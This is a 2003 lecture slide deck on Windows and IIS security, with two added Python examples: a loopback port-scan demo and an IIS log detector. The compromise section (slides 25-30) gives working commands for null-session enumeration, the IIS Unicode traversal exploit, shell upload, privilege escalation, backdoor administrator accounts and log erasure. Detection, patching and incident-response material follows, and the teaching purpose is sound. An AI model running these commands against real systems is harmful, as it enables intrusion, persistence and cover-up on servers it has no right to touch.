Windows Security Analysis. Computer Science E-Commerce Security '2003'. Matthew Cook.


Slide 1: Windows Security Analysis
- Computer Science E-Commerce Security '2003'
- Matthew Cook, http://escarpment.net/

Slide 2: Introduction
- Loughborough University, http://www.lboro.ac.uk/computing/
- Bandwidth Management Advisory Service, http://bmas.ja.net/

Slide 3: Windows Security Analysis (agenda)
- Introduction
- Step-by-step machine compromise
- Preventing attack
- Incident response
- Further reading

Slide 4: Introduction. Basic security overview.

Slide 5: Physical Security
- Secure location
- BIOS restrictions: password protection, boot device order
- Case locks and case panels

Slide 6: Security Threats
- Denial of service
- Theft of information
- Modification
- Fabrication (spoofing or masquerading)

Slide 7: Security Threats (continued). Why a compromise can occur:
- Physical security holes
- Software security holes
- Incompatible-usage security holes (components that are sound on their own but insecure in the combination the administrator has assembled)
- Social engineering
- Complacency

Slide 8: The Easiest Security Improvement. Good passwords:
- Usernames and passwords are the primary security defence
- Use a password that is easy to type, so that 'shoulder surfers' cannot follow it
- Use the first letters from song titles, song lyrics or film quotations

Slide 9: Can you buy Security?
"'This system is secure.' A product vendor might say: 'This product makes your network secure.' Or: 'We secure e-commerce.' Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: 'Secure from whom?' and 'Secure against what?'" (Bruce Schneier)

Slide 10: Step-by-step Machine Compromise. Why, where, how?

Slide 11: Background. Reasons for attack:
- Personal issues
- Political statement
- Financial gain (theft of money or information)
- Learning experience
- DoS (denial of service)
- Support for illegal activity

Slide 12: Gathering Information
- Companies House
- Internet search: http://www.google.co.uk
- Whois: http://www.netsol.com/cgi-bin/whois/whois
- A whois query can provide:
  - the registrant
  - the domain names registered
  - the administrative, technical and billing contacts
  - record created and updated date stamps
  - DNS servers for the domain

Slide 13: Gathering Information (continued)
- Use nslookup or dig: dig @<name server> <name> <query type>
- Query types available:
  - A: address record
  - ANY: all information available for the name
  - MX: mail exchange records
  - SOA: start of authority
  - HINFO: host information
  - AXFR: zone transfer (a server that answers this for arbitrary clients hands over the whole zone)
  - TXT: additional strings

Slide 14: Identifying System Weakness. Many products available: Nmap, Nessus, Pandora, pwdump, L0phtCrack, null authentication.

Slide 15: Nmap
- Port scanning tool
- Stealth scanning, OS fingerprinting
- Open source
- Runs under Unix-based OSes; a Win32 port is in development
- URL: http://www.insecure.org/nmap/

Slide 16: Nmap

Slide 17: Nessus
- Remote security scanner
- Very comprehensive
- Frequently updated plug-in modules
- Testing of DoS attacks (these checks can crash the target; schedule them with care)
- Open source
- Win32 and Java clients
- URL: http://nessus.org/

Slide 18: pwdump
- Version 3 (the 'e' in pwdump3e means the extracted hashes are encrypted in transit)
- Developed by Phil Staubs and Erik Hjelmstad
- Based on pwdump and pwdump2
- URL: http://www.ebiz-tech.com/html/pwdump.html
- Needs administrative privileges
- Extracts hashes even if SYSKEY is enabled
- Extracts from remote machines
- Identifies accounts with no password
- Self-contained utility

Slide 19: L0phtCrack
- Password auditing and recovery
- Cracks passwords from many sources
- Registration $249
- URL: http://www.atstake.com/research/lc3/

Slide 20: L0phtCrack. Cracks passwords from:
- Local machine
- Remote machine
- SAM file
- SMB sniffer
- pwdump file

Slide 21: Nmap Analysis
- nmap -sP 158.125.0.0/16 (ping scan)
- nmap -sS 158.125.0.0/16 (SYN 'stealth' scan; needs raw-socket privilege, i.e. root)

Slide 22: Nmap Analysis (continued). TCP connect scan:
- Completes a three-way handshake
- Very noisy (the connection reaches the application, so it is logged and detected by IDS)

Slide 23: Nmap Analysis (continued). TCP SYN scan:
- Half-open scanning (a full TCP connection is never made)
- Less noisy than the TCP connect scan

Slide 24: Nmap Analysis (continued)
- TCP FIN scan
  - FIN packet sent to the target port
  - RST returned for all closed ports; open ports stay silent
  - Mostly works only against UNIX-derived TCP/IP stacks: Windows answers with RST whatever the port state, so every port appears closed
- TCP Xmas tree scan
  - Sends a packet with the FIN, URG and PSH flags set
  - RST returned for all closed ports (same Windows caveat)
- TCP Null scan
  - Turns off all flags
  - RST returned for all closed ports (same Windows caveat)
- UDP scan
  - UDP packet sent to the target port
  - "ICMP port unreachable" for closed ports; an open port usually sends nothing, so the result rests on the absence of a reply, and ICMP rate limiting makes the scan slow
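The connect scan on slide 22 is "noisy" because the handshake completes and the connection is handed to the listening application. The following added example (not from the original slides) shows that end to end on the loopback interface: it opens its own listener, runs an nmap -sT style connect scan against that port and a closed neighbour, and then reads the listener's accept() queue to show that the probe is visible to the target. A SYN scan cannot be shown the same way without raw-socket privilege. All ports and addresses are chosen by the script itself.

```python
"""TCP connect scan (the nmap -sT technique) against a loopback listener, with
the listener recording every accepted connection. Constructed demo: the target
is a socket this script opens itself, so it runs offline."""
import socket


def connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Classify each port the way a connect scan does: a completed handshake is
    'open', an immediate RST (ECONNREFUSED) is 'closed', silence is 'filtered'."""
    states = {}
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))      # full three-way handshake
            states[port] = "open"
        except ConnectionRefusedError:
            states[port] = "closed"
        except OSError:                      # timeout or unreachable
            states[port] = "filtered"
        finally:
            sock.close()
    return states


def pick_free_port() -> int:
    """Bind to an ephemeral port and release it so the scan sees it as closed."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def demo():
    """Scan one listening and one closed loopback port; return the scanner's
    verdicts and the peers the listener's accept() queue recorded."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    listener.settimeout(0.5)
    open_port = listener.getsockname()[1]
    closed_port = pick_free_port()

    results = connect_scan("127.0.0.1", [open_port, closed_port])

    # The kernel completed the handshake and queued the connection; accept()
    # hands it to the application, which is where a server log or IDS sees it.
    seen = []
    while True:
        try:
            conn, peer = listener.accept()
        except socket.timeout:
            break
        seen.append(peer)
        conn.close()
    listener.close()
    return open_port, closed_port, results, seen


if __name__ == "__main__":
    open_port, closed_port, results, seen = demo()
    for port in (open_port, closed_port):
        print(f"127.0.0.1:{port} {results[port]}")
    print(f"listener accepted {len(seen)} connection(s) from {seen}")
```

Run it as a script: the open port is reported "open", the released port "closed", and the listener shows exactly one accepted connection from the scanner, which is the trace a SYN scan would not leave.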

Slide 25: Null Authentication
- Null session: net use \\camford\IPC$ "" /u:""
- Tools such as 'Red Button' automate this
- net view \\camford
- Obtainable over the null session: list of users, groups and shares; last logon date; last password change; much more

Slide 26: Exploiting the Security Hole. Using IIS Unicode / directory traversal:
- /scripts/../../winnt/system32/cmd.exe?/c+dir is caught by IIS's check for "../"
- /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir passes that check, because the overlong sequence %c0%af is only decoded to '/' afterwards; it displays the listing of C:\ in the browser
- Copy cmd.exe to /scripts/root.exe, after which no traversal is needed
- Echo an uploader, upload.asp, a line at a time: GET /scripts/root.exe?/c+echo+[blah]>upload.asp
- Upload cmdasp.asp using upload.asp
- Still vulnerable on 24% of e-commerce servers (the author's 2003 figure)

Slide 27: Gaining 'Root'
- cmdasp.asp provides a cmd shell, but in the context of the IIS anonymous/IWAM account, not SYSTEM
- The increase in privileges is then simple: an ISAPI DLL loaded in-process calls RevertToSelf, which drops IIS's impersonation and runs as SYSTEM (Horovitz); version 2 coded by Foundstone
- The uploaded DLL is requested as http://camford/scripts/idq.dll? so that IIS loads it
- Patch bulletin: MS01-026 (not included in Windows 2000 SP2)

Slide 28: Backdoor Access
- Create several user accounts: net user iisservice /ADD, then net localgroup administrators iisservice /ADD
- Add root shells listening on high-numbered ports (Tini is 3 KB in size)
- Add the backdoors to the 'Run' registry keys so they start again after reboot

Slide 29: System Alteration
- Web page alteration
- Information theft
- Enable services; add VNC
- Creating a warez server: net start msftpsvc, check access, upload a 1 MB test file, advertise it as a warez server

Slide 30: Audit Trail Removal
- Many machines have auditing disabled
- The main problem for the attacker is the IIS logs: DoS IIS before the buffered log entries are flushed to disk, or erase the logs from disk
- Erasing the Event Log is harder
- IDS systems and network monitoring at the firewall keep a record the attacker cannot reach from the host

Slide 31: Preventing Attack. How to stop the attack from happening and how to limit the damage from crackers.

Slide 32: NetBIOS/SMB Services
- NetBIOS name service [UDP 137]
- NetBIOS datagram (browsing) service [UDP 138]
- NetBIOS session service [TCP 139]
- RPC endpoint mapper [TCP 135]
- SMB/CIFS direct over TCP [TCP 445, UDP 445]; port 445 is Windows 2000 only (NT 4 does not use it)
- Block these ports at the firewall
- netstat -an lists what is actually listening on the host

Slide 33: NetBIOS/SMB Services (continued). To disable NetBIOS:
1. Select 'Disable NetBIOS over TCP/IP' in the WINS tab of the advanced TCP/IP properties.
2. Deselect 'File and Print Sharing' in the advanced settings of the 'Network and Dial-up Connections' window.

Slide 34: NetBIOS/SMB Services (continued). Disable null authentication:
- HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous, REG_DWORD set to 0, 1 or 2 (2 is the strongest setting and is Windows 2000 only; it can break domain trusts and browsing, so test it first)
- HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous, REG_DWORD set to 0 or 1

Slide 35: Operating System Patching. Operating systems contain bugs, and patches are the common way of distributing the fixes. A patch or hotfix usually contains the fix for one discovered bug; service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in the soon-to-be-released SP4 for Windows 2000.

Slide 36: Operating System Patching (continued)
- Only install patches after you have tested them in a development environment
- Only install patches obtained direct from the vendor
- Install security patches as soon as possible after release
- Install feature patches as and when needed
- Automate patch collection and installation as much as possible (QChain lets several hotfixes be installed with a single reboot)

Slide 37: Operating System Patching (continued). Use automated patching technology:
- SUS: Microsoft Software Update Services
- SMS: Microsoft Systems Management Server
- Ghost: Symantec imaging software
- And other application deployment software: lights-out distribution, deferred installation

Slide 38: Baseline Security Analyzer
- Freely available from Microsoft
- Written by Shavlik Technologies as a direct result of the Code Red attacks
- A GUI to HFNetChk (v3.81)
- Improved feature set
- Integrated SUS functionality

Slide 39: Baseline Security Analyzer (continued). MBSA v1.1 supports the following host OSes:
- Windows 2000 Professional / Server
- Windows XP Home / Professional
- Windows .NET Server not officially supported
- Windows NT not supported as a host OS
- Remote scanning available

Slide 40: Baseline Security Analyzer (continued). What applications does MBSA scan?
- Operating system
- Internet Explorer 5.01 and later
- Microsoft Office 2000 and 2002
- Media Player 6.4 and later
- Internet Information Services 4.0 and 5.0
- SQL Server 7.0 and 2000
- Exchange Server 5.5 and 2000

Slide 41: IPSec
- IP security; Linux connectivity using FreeS/WAN
- Mainly for wireless use, because WEP encryption has been cracked (AirSnort recovers the key from passively captured traffic)
- URL: http://www.freeswan.org/
- URL: http://airsnort.sourceforge.net/

Slide 42: Recent Worms
- Sadmind/IIS: directory traversal (Unicode exploit), launched from compromised Solaris hosts
- Code Red: .ida/.idq ISAPI buffer overflow
- CodeGreen: the same .ida/.idq buffer overflow
- Nimda: directory traversal (Unicode exploit), among other vectors
- Slammer: buffer overflow in the MS SQL Server 2000 Resolution Service (UDP 1434)

Slide 43: Sadmind/IIS. A defacement request as it appears in the IIS log (client IP, server IP, port, method, URI stem, query, status):
2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ f***+USA+Government^ ^ ^ ^ ^ f***+PoizonBOx^ ^ ^ ^ contact:sysadmcn@yahoo.com.cn^ >../wwwroot/default.htm 200 -
(The '^' characters are cmd.exe escapes for the HTML tags of the defacement page, which the transcript has lost; the request runs through the root.exe copy of cmd.exe planted as described on slide 26 and overwrites default.htm.)
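Slide 26 explains why the encoded request slips past IIS, and the log line above shows what the follow-up looks like once root.exe is in place. The following added example (it is not from the original slides) is a small detector over IIS W3C extended log lines: it reproduces the lenient decoding of the vulnerable IIS decoder, so the traversal is visible after normalisation, and flags the planted /scripts/root.exe. It goes slightly beyond the slides by also decoding a second time, which is the "superfluous decode" (%255c) variant fixed by MS01-026. The log lines, IP addresses and the set of overlong sequences (%c0%af for '/', %c1%9c for '\') are constructed for the example.

```python
"""Classify IIS W3C extended log entries that carry the Unicode / directory
traversal pattern. The sample log below is constructed, not a real server's."""
from __future__ import annotations

from urllib.parse import unquote_to_bytes

# Overlong UTF-8 encodings of '/' and '\' that unpatched IIS 4/5 decoded only
# after its "../" check had run on the still-encoded bytes (assumed set: the
# two sequences used by the Unicode exploit).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}


def normalize(stem: str, double_decode: bool = True) -> str:
    """Return the path as the vulnerable IIS decoder ended up seeing it."""
    raw = unquote_to_bytes(stem)                 # 1st decode: %c0%af -> C0 AF
    for seq, char in OVERLONG.items():
        raw = raw.replace(seq, char)             # lenient UTF-8: C0 AF -> '/'
    if double_decode:
        raw = unquote_to_bytes(raw)              # 2nd decode: %5c -> '\' (MS01-026)
    return raw.decode("latin-1").replace("\\", "/")


def reasons(stem: str) -> list[str]:
    """Why a URI stem is suspicious; empty list means it looks benign."""
    path = normalize(stem)
    found = []
    if ".." in path.split("/"):                  # a '..' segment survived decoding
        found.append("traversal")
    low = path.lower()
    if low.endswith("/scripts/root.exe"):        # the planted copy of cmd.exe
        found.append("planted root.exe")
    if low.endswith("/cmd.exe"):
        found.append("cmd.exe")
    return found


def parse_w3c(text: str):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        yield dict(zip(fields, line.split()))


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client IP, URI stem, reasons) for every suspicious record."""
    hits = []
    for rec in parse_w3c(text):
        why = reasons(rec["cs-uri-stem"])
        if why:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], why))
    return hits


# Constructed sample: two traversal probes, one use of the planted shell,
# two ordinary page requests.
SAMPLE_LOG = """#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
2001-05-03 22:34:49 203.0.113.7 - 198.51.100.10 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-05-03 22:34:51 203.0.113.7 - 198.51.100.10 80 GET /scripts/root.exe /c+echo+hacked+>../wwwroot/default.htm 200
2001-05-03 22:35:02 203.0.113.9 - 198.51.100.10 80 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 200
2001-05-03 22:36:10 192.0.2.44 - 198.51.100.10 80 GET /default.htm - 200
2001-05-03 22:36:12 192.0.2.44 - 198.51.100.10 80 GET /images/logo.gif - 200
"""

if __name__ == "__main__":
    for ip, stem, why in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem} -> {', '.join(why)}")
```

The ordering in normalize() is the whole point: IIS's "../" check ran on the percent-decoded bytes, and only the later UTF-8 decode turned C0 AF into a slash, so a detector that stops after one decode (double_decode=False) still misses the %255c form.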

Slide 44: IDS Snort
- IDS: intrusion detection system
- libpcap-based packet sniffer and logger
- Originally developed for the Unix platforms
- Open source
- Port to Win32 available (release 1.8.1)
- Installation on Win32 in under 30 minutes
- Run on your IIS server or standalone

Slide 45: IDS Snort (continued). Snort can detect:
- Stealth port scans
- CGI attacks
- FrontPage Extensions attacks
- ICMP activity
- SMTP activity
- SQL activity
- SMB probes

Slide 46: Incident Response. What to do when something does go wrong.

Slide 47: Incident Response (continued)
- Don't panic
- Unplug the network
- Get a notebook
- Back up the system and keep the backups
- Restrict use of email
- Look for information
- Investigate the cause
- Request help and assistance

Slide 48: Incident Response (continued)
- Important to return to service swiftly
  - Do not jeopardize security
  - If in doubt, rebuild
  - Perform forensics on a backup
- Keep documentation and evidence
- Contact the local CERT if the investigation proves the activity was not a worm or script kiddie

Slide 49: Further Reading
- Garfinkel, S. Web Security & Commerce. O'Reilly [ISBN 1-56592-269-7]
- Hassler, V. Security Fundamentals for E-Commerce. Artech House [ISBN 1-58053-108-3]
- Huth, M. R. A. Secure Communicating Systems. Cambridge University Press [ISBN 0-52180-731-X]
- Schneier, B. Secrets & Lies: Digital Security in a Networked World [ISBN 0-47125-311-1]

Slide 50: Useful Books, Tools and URLs
- Securing Windows NT/2000 Servers for the Internet (Stefan Norberg)
- Incident Response (Kenneth R. van Wyk, Richard Forno)
- Hacking Exposed: Network Security Secrets & Solutions (Stuart McClure et al.)
- Hacking Exposed Windows 2000: Network Security Secrets and Solutions (Scambray)

Slide 51: Useful Books, Tools and URLs (continued)
- Microsoft Security Website: http://www.microsoft.com/security/
- Computer Security Incident Response Team: http://www.cert.org/csirts/csirt_faq.html
- JANET CERT: http://www.ja.net/cert/
- Bugtraq mailing list: http://online.securityfocus.com/

Slide 52: Questions. Slides available at http://escarpment.net/

